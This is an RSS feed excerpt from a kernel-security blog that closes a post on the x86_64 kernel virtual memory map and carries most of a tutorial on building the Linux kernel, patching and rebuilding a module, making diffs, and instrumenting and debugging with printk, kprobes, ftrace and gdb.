<p><strong>Line 35</strong>: Defined by <a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L159"><code>EFI_VA_START</code></a>, this region unsurprisingly is used for EFI related stuff. This is the same Extensible Firmware Interface we touch on in the (currently unfinished, oops) Linternals series on <a href="https://sam4k.com/linternals-the-modern-boot-process-part-1/">The (Modern) Boot Process</a>.</p>
<p><strong>Line 36</strong>: More unused memory.</p>
<p><strong>Line 37</strong>: This region is used as a 1:1 mapping of the kernel&rsquo;s text section, defined by <a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/page_64_types.h#L50"><code>__START_KERNEL_map</code></a>. As we mentioned before, the kernel image is formatted like any other ELF, so has the same sections.</p>
<p>This is where we find all the functions in your kernel image, which is handy for debugging! In this instance, if we&rsquo;re debugging an <code>x86_64</code> target we can get a rough idea of what we&rsquo;re looking at just from the address.</p>
<p>If we see the <code>0xffffffff8.......</code> then we know we&rsquo;re looking at the text section!</p>
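<p>That eyeballing can be written down as a couple of range checks. This is only a sketch in C: the bounds are lifted from the 4-level memory map above and ignore KASLR (with it enabled the kernel image region is larger, so modules start higher), and the enum and function names are made up for illustration:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdint.h&gt;

/* Bounds taken from the x86_64 4-level memory map above (KASLR ignored). */
#define KERNEL_TEXT_START 0xffffffff80000000ULL
#define MODULES_START     0xffffffffa0000000ULL
#define MODULES_END       0xfffffffffeffffffULL

enum region { REGION_OTHER, REGION_KERNEL_TEXT, REGION_MODULES };

/* Hypothetical helper for classifying an address while debugging. */
static enum region guess_region(uint64_t addr)
{
    if (addr &gt;= KERNEL_TEXT_START &amp;&amp; addr &lt; MODULES_START)
        return REGION_KERNEL_TEXT;
    if (addr &gt;= MODULES_START &amp;&amp; addr &lt;= MODULES_END)
        return REGION_MODULES;
    return REGION_OTHER;
}
</code></pre></div><p>For example, <code>0xffffffff81000000</code> lands in the kernel text mapping, while a physmap address like <code>0xffff888000000000</code> falls through to <code>REGION_OTHER</code>.</p>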
<p><strong>Line 38</strong>: Any dynamically loaded (think <code>insmod</code>) modules are mapped into this region, which sits just after the kernel text mapping as we can see in the <a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L144">definition</a>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cp">#define MODULES_VADDR (__START_KERNEL_map + KERNEL_IMAGE_SIZE)
</span></span></span></code></pre></div><p><strong>Line 39</strong>: Defined by <a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/fixmap.h#L151"><code>FIXADDR_START</code></a>, this region is used for &ldquo;fix-mapped&rdquo; addresses. These are special virtual addresses which are set/used at compile-time, but are mapped to physical memory at boot.</p>
<p>The <a href="https://elixir.bootlin.com/linux/v5.17.6/source/include/asm-generic/fixmap.h#L30"><code>fix_to_virt()</code></a> family of functions are used to work with these special addresses.</p>
<p><strong>Line 40</strong>: We actually snuck this in to our last part! To recap, this region is:</p>
<blockquote>
<p>a legacy mapping that actually provided an executable mapping of kernel code for specific syscalls that didn&rsquo;t require elevated privileges and hence the whole user  -&gt; kernel mode context switch. Suffice to say it&rsquo;s defunct now, and calls to vsyscall table still work for compatibility, but now actually trap and act as a normal syscall</p>
</blockquote>
<p><strong>Line 41</strong>: Our final unused memory region!</p>
<hr>
<ol>
<li>The eagle-eyed will note there&rsquo;s a couple of diagrams in <a href="https://www.kernel.org/doc/Documentation/x86/x86_64/mm.txt">mm.txt</a>, one for 4-level page tables and one for 5-level. We&rsquo;ll touch on what this means in the next section, for now just know that 4-level is more common atm</li>
<li>Specifically, depending on the arch, the most significant N bits are always 0 for userspace and 1 for kernelspace; on <code>x86_64</code> with 4-level paging this is bits <code>47-63</code>. This leaves 47 bits of addressing, i.e. 2<sup>47</sup> bytes (128TB), each for userspace and kernelspace</li>
<li><a href="https://en-academic.com/dic.nsf/enwiki/1553430">https://en-academic.com/dic.nsf/enwiki/1553430</a></li>
<li><a href="https://www.oreilly.com/library/view/linux-device-drivers/0596000081/ch07s04.html">https://www.oreilly.com/library/view/linux-device-drivers/0596000081/ch07s04.html</a></li>
<li><a href="https://blogs.oracle.com/linux/post/minimizing-struct-page-overhead">https://blogs.oracle.com/linux/post/minimizing-struct-page-overhead</a></li>
<li><a href="https://www.kernel.org/doc/html/latest/dev-tools/kasan.html">https://www.kernel.org/doc/html/latest/dev-tools/kasan.html</a></li>
<li><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/cpu_entry_area.h#L90">https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/cpu_entry_area.h#L90</a></li>
</ol>
<h3 id="wrapping-up">Wrapping Up</h3>
<p><img src="https://sam4k.com/content/images/2022/05/thatstheend.gif" alt=""></p>
<p>We did it! We&rsquo;ve covered all the regions described in the kernel x86_64 4-level page table (we&rsquo;ll get on that in the next section) virtual memory map!</p>
<p>Hopefully there was enough detail here to provide some interesting context, but not so much that you might as well have been reading the source. For the more curious, we&rsquo;ll be focusing more on implementation details in the next part.</p>
<h4 id="digging-deeper">Digging Deeper</h4>
<p>If you&rsquo;re interested in exploring some of these concepts yourself, don&rsquo;t be scared away by the source! Diving into some of the <code>#define</code>&rsquo;s and symbols we&rsquo;ve mentioned so far and rooting around can be a good way to get started. <a href="https://elixir.bootlin.com/linux/latest/source">bootlin&rsquo;s Elixir Cross Referencer</a> is easy to use and you can jump about the source in your browser.</p>
<p>Additionally, playing around with <a href="https://github.com/osandov/drgn">drgn</a> (live kernel introspection), <a href="https://www.sourceware.org/gdb/">gdb</a> (we covered getting setup in <a href="https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/">this post</a>) and coding is a fun way to get stuck in and explore these memory topics.</p>
<h2 id="next-time">Next Time!</h2>
<p>After 3 parts, we&rsquo;ve laid a solid foundation for our understanding of what virtual memory is and the role it plays in Linux; both in the userspace and kernelspace.</p>
<p>Armed with this knowledge, we&rsquo;re in a prime position to begin digging a little deeper and getting into some real Linternals as we take a look at how things are actually implemented.</p>
<p>Next time we&rsquo;ll begin to take a look, at both an operating system and hardware level, at how this all works. I&rsquo;m not going to pretend I know how many parts that&rsquo;ll take!</p>
<p>Down the line I would also like to close this topic by bringing everything we&rsquo;ve learnt together by covering some exploitation techniques and mitigations RE virtual memory.</p>
<p>Thanks for reading!</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Patching, Instrumenting &amp; Debugging Linux Kernel Modules</title><description>An introductory look into patching, instrumenting and debugging Linux kernel modules.</description><link>https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/</link><guid isPermaLink="false">61faeaa97742d008b38dcee4</guid><category>linux</category><category>kernel</category><category>tooling</category><dc:creator>sam4k</dc:creator><pubDate>Fri, 15 Apr 2022 16:13:50 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/02/computer.gif" medium="image"/><content:encoded><![CDATA[<p>So not long ago I found myself having to test a fix in a Linux networking module as part of the coordinated vulnerability disclosure <a href="https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/">I posted about</a> recently.</p>
<p>Maybe my Google-fu wasn&rsquo;t on point, but it wasn&rsquo;t immediately clear what the best approach was, so hopefully this post can provide some direction for anyone interested in quickly patching, or instrumenting, Linux kernel modules.</p>
<p>Now, if we&rsquo;re talking about patching and instrumentation in the Linux kernel, I&rsquo;d be remiss not to at least touch on some debugging basics as well, right? So hopefully between those three topics we should be able to cover some good ground in this post!</p>
<p>❗</p>
<p>This post ended up being quite long, so if you like a narrative and hearing the why behind the how, please continue! But for brevity I&rsquo;ve also included the essentials in my repo over at <a href="https://github.com/sam4k/linux-kernel-resources">sam4k/linux-kernel-resources</a>.</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#preamble">Preamble</a>
<ul>
<li><a href="#kernel-module">Kernel Module?</a></li>
</ul>
</li>
<li><a href="#getting-setup">Getting Setup</a>
<ul>
<li><a href="#building-the-kernel">Building The Kernel</a></li>
<li><a href="#module-patching">Module Patching</a></li>
<li><a href="#shortcuts-alternatives">Shortcuts &amp; Alternatives</a>
<ul>
<li><a href="#minimal-configs">Minimal Configs</a></li>
<li><a href="#skip-building-altogether">Skip Building Altogether</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#getting-stuck-in">Getting Stuck In</a>
<ul>
<li><a href="#patch-diffs">Patch Diffs</a></li>
<li><a href="#instrumentation">Instrumentation</a></li>
<li><a href="#debugging">Debugging</a>
<ul>
<li><a href="#gdb-debugging-stub">GDB Debugging Stub</a></li>
<li><a href="#vmlinux-symbols-kaslr">vmlinux, symbols &amp; kaslr</a></li>
<li><a href="#loadable-modules">Loadable Modules</a></li>
<li><a href="#misc-gdb-tips">Misc GDB Tips</a></li>
<li><a href="#other-stuff">Other Stuff</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#faq">FAQ</a></li>
<li><a href="#postamble">Postamble</a></li>
</ul>
<h2 id="preamble">Preamble</h2>
<p>This post is written in the context of kernel security research, which might deviate from other use cases, so bear that in mind when reading this post.</p>
<p>When finding a vuln, or looking into an existing bug, I&rsquo;ll want to set up a representative environment to play around with it. This basically just means setting up an Ubuntu VM (representative of a typical in-the-wild box) with a vulnerable kernel version.</p>
<p>The only real hard requirement I assume, is that you&rsquo;re doing your kernel stuff in a VM; as this&rsquo;ll make debugging the kernel a lot easier down the line.</p>
<h3 id="kernel-module">Kernel Module?</h3>
<p>In the early, early days (&lt;1995) the Linux kernel was truly monolithic. Any functionality needed to be built into the base kernel at build time and that was that.</p>
<p>Since then, Loadable Kernel Modules (LKMs) have improved the flexibility of the Linux kernel, allowing features to be implemented as modules which can either be built into the base kernel or built as separate, loadable modules.</p>
<p>These can be loaded into, and unloaded from, kernel memory on demand without requiring a reboot or having to rebuild the kernel. Nowadays LKMs are used for device drivers, filesystem drivers, network drivers etc.</p>
<p><img src="https://sam4k.com/content/images/2022/03/ready_to_roll.gif" alt=""></p>
<hr>
<ol>
<li><a href="https://tldp.org/HOWTO/Module-HOWTO/x73.html">The Linux Documentation Project: Introduction to Linux Loadable Kernel Modules</a></li>
<li><a href="https://wiki.archlinux.org/title/Kernel_module">ArchWiki: Kernel Module</a></li>
</ol>
<h2 id="getting-setup">Getting Setup</h2>
<p>Alright, let&rsquo;s get things setup shall we? In this section I&rsquo;ll talk about how to get to a position where we&rsquo;re able to make changes to a kernel module, rebuild it and install it.</p>
<p>There are probably a lot of different ways to do this - some quicker, some hackier and some context specific. While I&rsquo;ll touch on some shortcuts in the next section, in my experience the easiest way to avoid a headache is just starting from a fresh kernel build.</p>
<p>So that&rsquo;s what we&rsquo;re going to do! Buckle up, let&rsquo;s see if I can keep this brief. First I&rsquo;ll quickly cover how to build the kernel and then move onto patching specific modules.</p>
<h3 id="building-the-kernel">Building The Kernel</h3>
<p>First things first, make sure you grab the necessary dependencies for building the kernel:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$ sudo apt-get install git fakeroot build-essential ncurses-dev xz-utils libssl-dev bc flex libelf-dev bison dwarves
</span></span></code></pre></div><p>With that sorted, <strong>download</strong> the kernel version you&rsquo;re wanting to play with from <a href="https://kernel.org">kernel.org</a>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ wget https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.17.tar.xz
</span></span></code></pre></div><p>If you&rsquo;re not sure what kernel version to go for, just pick one closest to your current environment, which you can check via the cmd <code>uname -r</code>; don&rsquo;t worry about patch versions or anything past the first two numbers, we ain&rsquo;t got no time for that.</p>
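<p>If you ever want to script that &ldquo;first two numbers&rdquo; step, here&rsquo;s a small sketch in C. The helper name <code>parse_major_minor()</code> is hypothetical, and it assumes the release string starts with <code>major.minor</code> like typical <code>uname -r</code> output does:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdio.h&gt;

/*
 * Hypothetical helper: pull major.minor out of a `uname -r` style string,
 * ignoring the patch level and any distro suffix.
 * Returns 0 on success, -1 if the string doesn't start with "N.N".
 */
static int parse_major_minor(const char *release, int *major, int *minor)
{
    /* "5.17.5-arch1-1" gives *major = 5, *minor = 17 */
    if (sscanf(release, "%d.%d", major, minor) != 2)
        return -1;
    return 0;
}
</code></pre></div><p>Feeding it something like <code>5.17.5-arch1-1</code> leaves you with 5 and 17, which is all you need to pick the matching tarball.</p>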
<p>Next let&rsquo;s <strong>extract</strong> the kernel source into our current dir and <code>cd</code> into it after:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ tar -xf linux-5.17.tar.xz <span class="o">&amp;&amp;</span> <span class="nb">cd</span> linux-5.17
</span></span></code></pre></div><p>Now we need to <strong>configure</strong> our kernel. The kernel configuration is stored in a file named <code>.config</code>, in the root of the kernel source tree (aka where we just <code>cd</code>&rsquo;d into).</p>
<p>On Debian-based distros you should be able to find your config at <code>/boot/config-$(uname -r)</code> or similar; on my Arch box it&rsquo;s compressed at <code>/proc/config.gz</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ cp /boot/config-<span class="k">$(</span>uname -r<span class="k">)</span> .config
</span></span></code></pre></div><p>This file contains all the configuration options for your kernel; if you want to play around with these you can use <code>make menuconfig</code> to tweak your config. Speaking of <strong>tweaking your config</strong>, you may want to make some changes:</p>
<ul>
<li>On Ubuntu, you&rsquo;ll likely encounter some key related issues if you try to build using their config, so set the following config values in your <code>.config</code>: <code>CONFIG_SYSTEM_TRUSTED_KEYS=&quot;&quot;</code>, <code>CONFIG_SYSTEM_REVOCATION_KEYS=&quot;&quot;</code></li>
<li>Given there may be patching and debugging involved down the line, it might be worth taking the opportunity to enable debugging symbols with <a href="https://cateee.net/lkddb/web-lkddb/DEBUG_INFO.html"><code>CONFIG_DEBUG_INFO</code></a><code>=y</code> and <a href="https://cateee.net/lkddb/web-lkddb/GDB_SCRIPTS.html"><code>CONFIG_GDB_SCRIPTS</code></a><code>=y</code>; you can enable these easily by using the helper <code>./scripts/config -e DEBUG_INFO -e GDB_SCRIPTS</code></li>
</ul>
<p>With <code>.config</code> ready, let&rsquo;s crack on. By using <code>oldconfig</code> instead of <code>menuconfig</code> we can avoid the ncurses interface and just update the kernel configuration using our <code>.config</code> (it just means we may get some prompts during the make process for new options):</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ make oldconfig
</span></span></code></pre></div><p>Now we&rsquo;re ready to start <strong>building</strong> the kernel, and depending on your system and the <code>.config</code> we&rsquo;ve copied over, this can <em>take a while</em>, so fire all CPU cores:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ make -j<span class="k">$(</span>nproc<span class="k">)</span>
</span></span></code></pre></div><p>Next up, we can start installing our freshly built kernel. First up are the modules, which will typically be installed to <code>/lib/modules/&lt;kernel_vers&gt;</code>. So, to install our modules we&rsquo;ll go ahead and run:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ sudo make modules_install
</span></span></code></pre></div><p>Finally we&rsquo;ll install the kernel itself; the following command will do all the housekeeping required to let us select the new kernel from our bootloader:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ sudo make install 
</span></span></code></pre></div><p><img src="https://sam4k.com/content/images/2022/03/mission_accomplished.gif" alt=""></p>
<p>And voila! Just like that we&rsquo;ve built our Linux kernel from source, nabbing the config from our current environment, and we&rsquo;re ready to do some tinkering!</p>
<h3 id="module-patching">Module Patching</h3>
<p>Okay, now we have a clean environment to work with and can start tinkering! Because we&rsquo;ve built the kernel from source, we know we&rsquo;re building our patched modules in the exact same development environment as the kernel we&rsquo;re installing them into.</p>
<p>While the initial build can be lengthy, it&rsquo;s straightforward and we avoid the headache of out-of-tree module taints, signing issues and other finicky version-mismatch related issues.</p>
<p>Instead, we can make whatever changes we intend to make to our module and then run much the same commands we did during the initial install, only targeting our patched module(s). For example, for CVE-2022-0435 I tested patches in <code>net/tipc/monitor.c</code>, so to rebuild and install my patched module I&rsquo;d simply run:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$ make M=net/tipc
</span></span><span class="line"><span class="cl">$ sudo make M=net/tipc modules_install
</span></span></code></pre></div><p>I&rsquo;m then able to go ahead and re/load <code>tipc</code> and we&rsquo;re good to go! Easy as that.</p>
<h3 id="shortcuts-alternatives">Shortcuts &amp; Alternatives</h3>
<p>As some of you may already be painfully aware, building a full-featured kernel can actually take some time, especially in a VM with limited resources.</p>
<h4 id="minimal-configs">Minimal Configs</h4>
<p>So to speed things up dramatically, if you&rsquo;re familiar with the module(s) you&rsquo;re going to be looking at, a more efficient approach is to start from a minimal config and enable the bare minimum features required for your testing environment.</p>
<p>For example <code>$ make defconfig</code> will generate a minimal default config for your arch, and then you can use <code>$ make menuconfig</code> to make further adjustments.</p>
<h4 id="skip-building-altogether">Skip Building Altogether</h4>
<p>Depending on your requirements, you can just avoid building altogether:</p>
<ul>
<li>if you just want to do some debugging, you could pull debug symbols from your distribution repo (see section on symbols below)</li>
<li>you may be able to fetch source from your distro repos, where you can then patch and build modules from there</li>
<li>if you don&rsquo;t need to worry about module signing/taint, and you&rsquo;re happy to get messy, there&rsquo;s hackier ways to do all this too</li>
</ul>
<h2 id="getting-stuck-in">Getting Stuck In</h2>
<p><img src="https://sam4k.com/content/images/2022/03/fun_begins.gif" alt=""></p>
<p>Now that we&rsquo;ve got our kernel dev environment setup, it&rsquo;s time to get stuck in! I&rsquo;ll briefly touch on generating patches, because why not, and instrumentation (though I&rsquo;m not as familiar with this topic) before finally covering how we can debug kernel modules.</p>
<h3 id="patch-diffs">Patch Diffs</h3>
<p>Disclaimer, if you want to submit any patches to the kernel formally, then definitely check out this <em><strong>comprehensive</strong></em> kernel doc on the various dos &amp; donts of <a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">submitting patches</a>.</p>
<p>That said, we&rsquo;re just playing around here! Plus I don&rsquo;t think it actually mentions the command in that particular doc. Anyway, I digress, we can run the following commands to generate a simple patch diff between two files:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ diff -u monitor.c monitor_patched.c 
</span></span><span class="line"><span class="cl">--- monitor.c   2021-03-11 13:19:18.000000000 +0000
</span></span><span class="line"><span class="cl">+++ monitor_patched.c 2022-04-06 19:25:27.449661568 +0100
</span></span><span class="line"><span class="cl">@@ -503,8 +503,10 @@
</span></span><span class="line"><span class="cl">        /* Cache current domain record <span class="k">for</span> later use */
</span></span><span class="line"><span class="cl">        dom_bef.member_cnt <span class="o">=</span> 0<span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="nv">dom</span> <span class="o">=</span> peer-&gt;domain<span class="p">;</span>
</span></span><span class="line"><span class="cl">-       <span class="k">if</span> <span class="o">(</span>dom<span class="o">)</span>
</span></span><span class="line"><span class="cl">+       <span class="k">if</span> <span class="o">(</span>dom<span class="o">)</span> <span class="o">{</span>
</span></span><span class="line"><span class="cl">+               printk<span class="o">(</span><span class="s2">&#34;printk debugging ftw!\n&#34;</span><span class="o">)</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">                memcpy<span class="o">(</span><span class="p">&amp;</span>dom_bef, dom, dom-&gt;len<span class="o">)</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">+       <span class="o">}</span>
</span></span><span class="line"><span class="cl"> 
</span></span><span class="line"><span class="cl">        /* Transform and store received domain record */
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="o">(</span>!dom <span class="o">||</span> <span class="o">(</span>dom-&gt;len &lt; new_dlen<span class="o">))</span> <span class="o">{</span>
</span></span></code></pre></div><p>Where <code>-u</code> tells <code>diff</code> to use the unified format, which provides us with 3 lines of unified context (this is the default, but N lines of context can be specified with <code>-U N</code>).</p>
<p>This unified format provides a line-by-line comparison of the given files, letting us know what&rsquo;s changed from one to another:</p>
<ol>
<li>Line 2 is part of the patch header, prefixed with <code>---</code>, and tells us the original file, its modification time and timezone offset from UTC (thanks <a href="https://twitter.com/kfazz01">@kfazz01</a>!)</li>
<li>Line 3 is also part of the header, prefixed with <code>+++</code>, and tells us the new file, its modification time and timezone offset from UTC (thanks <a href="https://twitter.com/kfazz01">@kfazz01</a>!)</li>
<li>Line 4, encapsulated by <code>@@</code>, defines the start of a &ldquo;hunk&rdquo; (group) of changes in our diff; sticking to <code>-</code> for original and <code>+</code> for new, <code>-503,8</code> tells us this hunk starts from line 503 in <code>monitor.c</code> and shows 8 lines. <code>+503,10</code> means the hunk also starts from line 503 in <code>monitor_patched.c</code> but shows 10 lines (which checks out as we removed 1 and added 3).</li>
<li>Lines 5-7 &amp; 13-15 are our 3 lines of unified context, just to give us some idea of what&rsquo;s going on around the lines we&rsquo;ve changed</li>
<li>Lines 8-12 then are, by process of elimination, the lines we&rsquo;ve changed. Changing things up, now <code>-</code> prefixes lines we&rsquo;ve removed (i.e. in <code>monitor.c</code> but no longer in <code>monitor_patched.c</code>) and <code>+</code> prefixes lines we&rsquo;ve added to <code>monitor_patched.c</code></li>
</ol>
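<p>The hunk header described above is regular enough to pull apart with a single <code>sscanf()</code>. A minimal sketch in C follows; the struct and function names are hypothetical, and it only handles the full <code>-a,b +c,d</code> form (real diffs may omit a count when it is 1):</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdio.h&gt;

struct hunk {
    int old_start, old_len; /* e.g. -503,8  */
    int new_start, new_len; /* e.g. +503,10 */
};

/*
 * Hypothetical helper: parse "@@ -a,b +c,d @@" into a struct hunk.
 * Returns 0 on success, -1 if the line doesn't match that exact shape.
 */
static int parse_hunk_header(const char *line, struct hunk *h)
{
    int n = sscanf(line, "@@ -%d,%d +%d,%d @@",
                   &amp;h-&gt;old_start, &amp;h-&gt;old_len,
                   &amp;h-&gt;new_start, &amp;h-&gt;new_len);

    return n == 4 ? 0 : -1;
}
</code></pre></div><p>For our diff that gives 503/8 for the original and 503/10 for the new file; the difference of 2 lines is the 3 we added minus the 1 we removed.</p>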
<p>So there&rsquo;s a quick ramble on patch diffs. It&rsquo;s as easy as that. We can also do diffs on entire directories/globs of files:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$ diff -Naur net/tipc/ net/tipc_patched/
</span></span></code></pre></div><p>Where <code>-N</code> treats missing files as empty, <code>-a</code> treats all files as text, <code>-r</code> recursively compares subdirs and <code>-u</code> is the same as before.</p>
<p>If we want to save these patches and apply them down the line, we can redirect the output into a file and then apply it to the original:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ diff -u monitor.c monitor_patched.c &gt; monitor.patch
</span></span><span class="line"><span class="cl">$ patch -p0 &lt; monitor.patch 
</span></span><span class="line"><span class="cl">patching file monitor.c
</span></span></code></pre></div><p>When we pass <code>patch</code> a patch file, it expects an argument <code>-pX</code> where <code>X</code> defines how many leading directory levels to strip from the file names in our patch header. Ours was like <code>--- monitor.c</code>, so we include <code>-p0</code> as there&rsquo;s 0 dir levels to strip!</p>
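<p>If the stripping is hard to picture, this small Python sketch mimics what <code>-pX</code> does to a file name from a patch header. It&rsquo;s a simplification with a function name of my own (real <code>patch</code> also treats runs of adjacent slashes as one), and the <code>a/net/tipc/monitor.c</code> path is just an example in the style of a git diff.</p>

```python
def strip_components(path, count):
    """Mimic how patch's -pN shortens a file name from a patch header.

    Drops the first `count` slash-separated components, so with count=1
    "a/net/tipc/monitor.c" becomes "net/tipc/monitor.c".
    """
    parts = path.split("/")
    if count >= len(parts):
        raise ValueError("cannot strip %d components from %r" % (count, path))
    return "/".join(parts[count:])


if __name__ == "__main__":
    print(strip_components("monitor.c", 0))             # monitor.c
    print(strip_components("a/net/tipc/monitor.c", 1))  # net/tipc/monitor.c
```

<p>So a patch generated from the top of a source tree usually wants <code>-p0</code>, while git-style patches with their <code>a/</code> and <code>b/</code> prefixes usually want <code>-p1</code>.</p>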
<h3 id="instrumentation">Instrumentation</h3>
<p><img src="https://sam4k.com/content/images/2022/03/printk-1.gif" alt=""></p>
<p>Memes aside, <code>printf()</code> does the job in your own C projects, <code>printk()</code> is just the kernel-land equivalent[1] and sometimes a cheeky <code>printk(&quot;here&quot;)</code> is all you need.</p>
<p>Using the patching approach we mentioned above, sometimes the easiest way to debug or trace execution isn&rsquo;t to set up some complicated framework but simply to sprinkle in some <code>printk()</code>&rsquo;s, rebuild your module and voila!</p>
<p>And well, that&rsquo;s the extent of my practical kernel instrumentation knowledge. But I&rsquo;d feel bad making a whole section just to meme <code>printk()</code>, so while I can&rsquo;t expand on them fully, here are a couple of other avenues for kernel instrumentation:</p>
<h4 id="kprobes">kprobes</h4>
<blockquote>
<p>kprobes enable you to dynamically break into any kernel routine and collect debugging and performance information non-disruptively. You can trap at almost any kernel code address, specifying a handler routine to be invoked when the breakpoint is hit — <a href="https://www.kernel.org/doc/html/latest/trace/kprobes.html">kernel.org/doc</a></p>
</blockquote>
<p>kprobes provide a fairly comprehensive API for your instrumentation needs, however the flip side is that it does require some light kernel development skills (perhaps a good intro task to kernel development??) to get stuck in.</p>
<h4 id="ftrace">ftrace</h4>
<p>ftrace, or function tracer, is &ldquo;an internal tracer designed to help out developers and designers of systems to find what is going on inside the kernel [&hellip;] although ftrace is typically considered the function tracer, it is really a frame work of several assorted tracing utilities.&rdquo; <a href="https://www.kernel.org/doc/Documentation/trace/ftrace.txt">[2]</a>.</p>
<p>ftrace is actually quite interesting, as unlike similarly named (but not to be confused) tools like <code>strace</code>, there is no usermode binary to interact with the kernel component. Instead, users interact with the tracefs file system.</p>
<p>For the sake of brevity, if you&rsquo;re interested in checking out ftrace, here is an introductory guide by Gaurav Kamathe on opensource.com:</p>
<p><a href="https://opensource.com/article/21/7/linux-kernel-ftrace">Analyze the Linux kernel with ftrace</a></p>
<h4 id="ebpf">eBPF??</h4>
<p>Okay, this might be a bit of a rogue one. Quick disclaimer being I&rsquo;ve unfortunately not found the time, despite it being high up on my list, to properly play with eBPF. So take any statements RE eBPF features with a pinch of salt!</p>
<p><img src="https://sam4k.com/content/images/2022/04/idkanything.gif" alt=""></p>
<p>That said, to summarise (I think I got this bit right), eBPF is a kernel feature introduced in the 3.x series (the <code>bpf()</code> syscall landed in 3.18) and heavily extended throughout 4.x, that allows privileged usermode applications to run sandboxed code in the kernel.</p>
<p>I&rsquo;m particularly interested in seeing the limits of its application, particularly in spaces such as detection, rootkits and debugging, for something originally focused around networking.</p>
<p>Although, RE instrumentation &amp; debugging, I&rsquo;m not sure how much extra mileage eBPF would be able to provide. The eBPF bytecode runs in a sandboxed environment within the kernel, and as far as I&rsquo;m aware can&rsquo;t alter kernel data.</p>
<p>That said, from an instrumentation perspective we can still do some interesting tracing. For example, we can attach to one of our kprobes and read function args &amp; ret values.</p>
<p>Anyway, perhaps just some food-for-thought, but I&rsquo;ll stop rambling! I&rsquo;ll drop a couple of links below to existing publications on eBPF instrumentation/debugging [3].</p>
<hr>
<ol>
<li>The reason it&rsquo;s <code>printk()</code>, and not the classic <code>printf()</code> we usually find in C, is that the C standard library isn&rsquo;t available in kernel mode; so the <code>k</code> in <code>printk()</code> lets us know we&rsquo;re using the kernel-land implementation.</li>
<li><a href="https://www.kernel.org/doc/Documentation/trace/ftrace.txt">https://www.kernel.org/doc/Documentation/trace/ftrace.txt</a></li>
<li><a href="https://www.usenix.org/sites/default/files/conference/protected-files/lisa18_slides_babrou.pdf">Debugging Linux issues with eBPF</a> (USENIX LISA18)  </li>
<li><a href="https://elinux.org/images/d/dc/Kernel-Analysis-Using-eBPF-Daniel-Thompson-Linaro.pdf">Kernel analysis using eBPF</a></li>
</ol>
<h3 id="debugging">Debugging</h3>
<p><img src="https://sam4k.com/content/images/2022/04/noidea.gif" alt=""></p>
<p>Working with something as complex as the Linux kernel, you&rsquo;ll inevitably find yourself resonating with the above gif, and that&rsquo;s alright! That said, getting a smooth debugging workflow set up can go a long way towards alleviating the confusion.</p>
<p>Setting up a good debugging environment means you can set breakpoints, allowing you to pause kernel execution at moments of interest, as well as inspect, and even change, registers and memory! There&rsquo;s also scope for scripting various elements of this process too.</p>
<h4 id="gdb-debugging-stub">GDB Debugging Stub</h4>
<p>Remember about 2000 words ago I mentioned the only real assumption I was going to make is that you&rsquo;re doing your kernel testing/shenanigans in a VM?</p>
<p>It turns out that trying to debug the kernel you&rsquo;re running is&hellip; tricky. So besides snapshots and various other QoL features, a big pro to using VMs is the ability to remotely debug them at the kernel-level from our host (or another guest) using a debugger<a href="https://www.sourceware.org/gdb/">[1]</a>.</p>
<p>The debugger in question, gdb, or the GNU Project debugger<a href="https://www.sourceware.org/gdb/">[1]</a>, is a portable debugger that runs on many UNIX-like systems and is basically the de facto Linux kernel debugger (@ me).</p>
